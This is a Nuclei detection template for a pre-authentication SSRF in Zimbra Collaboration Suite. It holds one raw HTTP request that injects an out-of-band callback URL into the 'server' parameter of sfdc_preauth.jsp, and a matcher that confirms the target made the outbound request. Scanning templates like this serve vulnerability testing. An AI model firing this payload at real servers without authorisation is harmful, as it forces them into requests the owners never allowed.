nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml

23 lines
528 B
YAML

id: zimbra-preauth-ssrf
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
reference:
- https://www.adminxe.com/2183.html
tags: zimbra,ssrf,oob
requests:
- raw:
- |
GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"